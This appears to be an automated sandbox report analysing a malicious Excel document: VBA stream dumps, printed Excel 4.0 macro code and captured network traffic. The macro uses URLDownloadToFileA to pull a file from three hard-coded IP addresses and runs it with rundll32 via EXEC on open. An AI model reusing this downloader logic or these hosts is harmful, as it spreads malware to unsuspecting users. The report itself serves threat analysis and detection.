Data ASCII: | . . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 fd 03 00 00 00 00 00 00 01 00 00 00 1c cc 5e 9c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
"Blasr" |
Application.Run |
Attribute |
Auto_Open() |
VB_Name |
Private |
VBA Code |
---|
|
VBA File Name: Briks.cls, Stream Size: 990 |
---|
General | |
---|---|
Stream Path: | VBA/Briks |
VBA File Name: | Briks.cls |
Stream Size: | 990 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 1e a1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
"Briks" |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: Byutut.bas, Stream Size: 1056 |
---|
General | |
---|---|
Stream Path: | VBA/Byutut |
VBA File Name: | Byutut.bas |
Stream Size: | 1056 |
Data ASCII: | . . . . . . . . . R . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . ; G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 52 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 59 03 00 00 f5 03 00 00 00 00 00 00 01 00 00 00 1c cc 3b 47 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
Attribute |
VB_Name |
"Byutut" |
VBA Code |
---|
|
VBA File Name: Class1.cls, Stream Size: 1151 |
---|
General | |
---|---|
Stream Path: | VBA/Class1 |
VBA File Name: | Class1.cls |
Stream Size: | 1151 |
Data ASCII: | . . . . . . . . . Z . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 5a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 61 03 00 00 c5 03 00 00 00 00 00 00 01 00 00 00 1c cc a3 ac 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: Class2.cls, Stream Size: 999 |
---|
General | |
---|---|
Stream Path: | VBA/Class2 |
VBA File Name: | Class2.cls |
Stream Size: | 999 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 7e e9 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: Class3.cls, Stream Size: 999 |
---|
General | |
---|---|
Stream Path: | VBA/Class3 |
VBA File Name: | Class3.cls |
Stream Size: | 999 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc c8 17 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: Kikide.cls, Stream Size: 1249 |
---|
General | |
---|---|
Stream Path: | VBA/Kikide |
VBA File Name: | Kikide.cls |
Stream Size: | 1249 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . R . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 9a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff a1 03 00 00 29 04 00 00 00 00 00 00 01 00 00 00 1c cc 52 09 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
"Kikide" |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: UserForm1.frm, Stream Size: 1526 |
---|
General | |
---|---|
Stream Path: | VBA/UserForm1 |
VBA File Name: | UserForm1.frm |
Stream Size: | 1526 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { \\ . . B . H N . . . . . I . . . . . O < . * N . 7 { / a . . . 0 $ . . . v . K . . . . 1 . . . . . . . . . h : . . L N . . V = . 5 . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 00 01 00 00 9e 04 00 00 e4 00 00 00 84 02 00 00 ff ff ff ff a5 04 00 00 09 05 00 00 00 00 00 00 01 00 00 00 1c cc 2b 09 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 7b 5c fd e6 42 8a 48 4e aa cd df d6 fd 49 99 1c 83 98 07 4f 3c d6 2a 4e ad 37 7b 2f 61 a2 ba cd 30 24 1b a6 ea 76 1d 4b a3 81 e7 c2 31 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: Vrest.bas, Stream Size: 679 |
---|
General | |
---|---|
Stream Path: | VBA/Vrest |
VBA File Name: | Vrest.bas |
Stream Size: | 679 |
Data ASCII: | . . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 1c cc 27 ea 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
Attribute |
"Vrest" |
VB_Name |
VBA Code |
---|
|
VBA File Name: Vsewd.cls, Stream Size: 990 |
---|
General | |
---|---|
Stream Path: | VBA/Vsewd |
VBA File Name: | Vsewd.cls |
Stream Size: | 990 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc b2 ae 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
"Vsewd" |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
Streams |
---|
Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 856 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 856 |
Entropy: | 5.31019504221 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 4 4 8 1 7 C A 7 - 1 5 D A - 4 D 2 5 - B 4 C E - 4 7 0 F 9 E A 0 E 5 D F } " . . D o c u m e n t = K i k i d e / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = B r i k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B y u t u t . . D o c u m e n t = V s e w d / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . C l a s s = C l a s s 2 . . C l a s s = C l a s s 3 . . M o d u l e = B l a s r . . M o d u l e = V r e s t . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 |
Data Raw: | 49 44 3d 22 7b 34 34 38 31 37 43 41 37 2d 31 35 44 41 2d 34 44 32 35 2d 42 34 43 45 2d 34 37 30 46 39 45 41 30 45 35 44 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4b 69 6b 69 64 65 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 42 72 69 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 42 79 75 74 75 74 0d 0a 44 6f 63 75 6d 65 6e 74 3d 56 73 65 77 |
Stream Path: PROJECTwm, File Type: data, Stream Size: 209 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 209 |
Entropy: | 3.32661660177 |
Base64 Encoded: | False |
Data ASCII: | K i k i d e . K . i . k . i . d . e . . . B r i k s . B . r . i . k . s . . . B y u t u t . B . y . u . t . u . t . . . V s e w d . V . s . e . w . d . . . C l a s s 1 . C . l . a . s . s . 1 . . . C l a s s 2 . C . l . a . s . s . 2 . . . C l a s s 3 . C . l . a . s . s . 3 . . . B l a s r . B . l . a . s . r . . . V r e s t . V . r . e . s . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . . |
Data Raw: | 4b 69 6b 69 64 65 00 4b 00 69 00 6b 00 69 00 64 00 65 00 00 00 42 72 69 6b 73 00 42 00 72 00 69 00 6b 00 73 00 00 00 42 79 75 74 75 74 00 42 00 79 00 75 00 74 00 75 00 74 00 00 00 56 73 65 77 64 00 56 00 73 00 65 00 77 00 64 00 00 00 43 6c 61 73 73 31 00 43 00 6c 00 61 00 73 00 73 00 31 00 00 00 43 6c 61 73 73 32 00 43 00 6c 00 61 00 73 00 73 00 32 00 00 00 43 6c 61 73 73 33 00 43 |
Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97 |
---|
General | |
---|---|
Stream Path: | UserForm1/\x1CompObj |
File Type: | data |
Stream Size: | 97 |
Entropy: | 3.61064918306 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266 |
---|
General | |
---|---|
Stream Path: | UserForm1/\x3VBFrame |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 266 |
Entropy: | 4.62034133633 |
Base64 Encoded: | True |
Data ASCII: | V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w |
Data Raw: | 56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 |
Stream Path: UserForm1/f, File Type: data, Stream Size: 38 |
---|
General | |
---|---|
Stream Path: | UserForm1/f |
File Type: | data |
Stream Size: | 38 |
Entropy: | 1.54052096453 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: UserForm1/o, File Type: empty, Stream Size: 0 |
---|
General | |
---|---|
Stream Path: | UserForm1/o |
File Type: | empty |
Stream Size: | 0 |
Entropy: | 0.0 |
Base64 Encoded: | False |
Data ASCII: | |
Data Raw: |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4263 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 4263 |
Entropy: | 4.38205341073 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . |
Data Raw: | cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: VBA/dir, File Type: data, Stream Size: 1024 |
---|
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | data |
Stream Size: | 1024 |
Entropy: | 6.73319737871 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . - |
Data Raw: | 01 fc b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 be 20 84 62 0e 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Macro 4.0 Code |
---|
,,"=CONCATENATE(AF80,AG80,AH78,AG78,AG79)",,,,,,"=CONCATENATE(AF80,AG81,AH78,AG78,AG79)",,1,,,,"=CONCATENATE(AF80,AG82,AH78,AG78,AG79)",,9,,,,,,,"=ON.TIME(NOW()+""00:00:02"",""Grestes"")",,,.d,=NOW(),,,,,at,"=FORMULA(AG85&AG86&AG92,AI83)",,,,"=""http://""","=""91.211.91.81/""",,,=HALT(),,,"=""5.34.179.36/""",,,,,,"=""45.153.229.23/""",,uRlMon,,,,,,,,,,,,JJCCBB,,,,"=""URLDo""",,Belandes,,,,"=""wnloadT""",,,,,,,=GOTO(Blodas!G6),,,,,,,..\Ladfge.VDGfwr,,,,,,,,,,,,,,,,,,,,,,"=""oFileA""",,,,
"=REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)""=Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)""=IF(G12<0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))""=IF(G13<0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))""=IF(G14<0,CLOSE(0),)"=GOTO(Jioka!H4)
,"=""rund""",,"=""ll32 ..\Ladfge.VDGfwr,DllReg""","=""isterServer""",,,,,=PI()=EXEC(I7&I9&I10)=PI(),,,,=HALT(),
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
05/04/21-18:21:56.395949 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 91.211.91.81 | 192.168.2.22 |
05/04/21-18:21:57.137581 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 5.34.179.36 | 192.168.2.22 |
05/04/21-18:21:57.348727 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 45.153.229.23 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 4, 2021 18:27:40.941601038 CEST | 49720 | 80 | 192.168.2.6 | 91.211.91.81 |
May 4, 2021 18:27:41.027003050 CEST | 80 | 49720 | 91.211.91.81 | 192.168.2.6 |
May 4, 2021 18:27:41.030467987 CEST | 49720 | 80 | 192.168.2.6 | 91.211.91.81 |
May 4, 2021 18:27:41.030962944 CEST | 49720 | 80 | 192.168.2.6 | 91.211.91.81 |
May 4, 2021 18:27:41.114449024 CEST | 80 | 49720 | 91.211.91.81 | 192.168.2.6 |
May 4, 2021 18:27:41.178436995 CEST | 80 | 49720 | 91.211.91.81 | 192.168.2.6 |
May 4, 2021 18:27:41.178531885 CEST | 49720 | 80 | 192.168.2.6 | 91.211.91.81 |
May 4, 2021 18:27:41.228804111 CEST | 49722 | 80 | 192.168.2.6 | 5.34.179.36 |
May 4, 2021 18:27:41.373819113 CEST | 80 | 49722 | 5.34.179.36 | 192.168.2.6 |
May 4, 2021 18:27:41.373986006 CEST | 49722 | 80 | 192.168.2.6 | 5.34.179.36 |
May 4, 2021 18:27:41.374579906 CEST | 49722 | 80 | 192.168.2.6 | 5.34.179.36 |
May 4, 2021 18:27:41.520831108 CEST | 80 | 49722 | 5.34.179.36 | 192.168.2.6 |
May 4, 2021 18:27:41.950759888 CEST | 80 | 49722 | 5.34.179.36 | 192.168.2.6 |
May 4, 2021 18:27:41.951782942 CEST | 49722 | 80 | 192.168.2.6 | 5.34.179.36 |
May 4, 2021 18:27:41.957674026 CEST | 49723 | 80 | 192.168.2.6 | 45.153.229.23 |
May 4, 2021 18:27:42.022432089 CEST | 80 | 49723 | 45.153.229.23 | 192.168.2.6 |
May 4, 2021 18:27:42.022526026 CEST | 49723 | 80 | 192.168.2.6 | 45.153.229.23 |
May 4, 2021 18:27:42.023101091 CEST | 49723 | 80 | 192.168.2.6 | 45.153.229.23 |
May 4, 2021 18:27:42.087676048 CEST | 80 | 49723 | 45.153.229.23 | 192.168.2.6 |
May 4, 2021 18:27:42.148572922 CEST | 80 | 49723 | 45.153.229.23 | 192.168.2.6 |
May 4, 2021 18:27:42.148631096 CEST | 49723 | 80 | 192.168.2.6 | 45.153.229.23 |
May 4, 2021 18:28:46.180049896 CEST | 80 | 49720 | 91.211.91.81 | 192.168.2.6 |
May 4, 2021 18:28:46.180279016 CEST | 49720 | 80 | 192.168.2.6 | 91.211.91.81 |
May 4, 2021 18:28:46.951474905 CEST | 80 | 49722 | 5.34.179.36 | 192.168.2.6 |
May 4, 2021 18:28:46.951672077 CEST | 49722 | 80 | 192.168.2.6 | 5.34.179.36 |
May 4, 2021 18:28:47.149940014 CEST | 80 | 49723 | 45.153.229.23 | 192.168.2.6 |
May 4, 2021 18:28:47.150105953 CEST | 49723 | 80 | 192.168.2.6 | 45.153.229.23 |
May 4, 2021 18:29:22.367482901 CEST | 49723 | 80 | 192.168.2.6 | 45.153.229.23 |
May 4, 2021 18:29:22.367686987 CEST | 49722 | 80 | 192.168.2.6 | 5.34.179.36 |
May 4, 2021 18:29:22.367860079 CEST | 49720 | 80 | 192.168.2.6 | 91.211.91.81 |
May 4, 2021 18:29:22.432441950 CEST | 80 | 49723 | 45.153.229.23 | 192.168.2.6 |
May 4, 2021 18:29:22.452354908 CEST | 80 | 49720 | 91.211.91.81 | 192.168.2.6 |
May 4, 2021 18:29:22.512753963 CEST | 80 | 49722 | 5.34.179.36 | 192.168.2.6 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 4, 2021 18:27:18.094810963 CEST | 53 | 62044 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:18.899960995 CEST | 63791 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:18.950412989 CEST | 53 | 63791 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:19.804089069 CEST | 64267 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:19.852813005 CEST | 53 | 64267 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:20.939779043 CEST | 49448 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:20.999002934 CEST | 53 | 49448 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:21.270270109 CEST | 60342 | 53 | 192.168.2.6 | 8.8.8.8 |
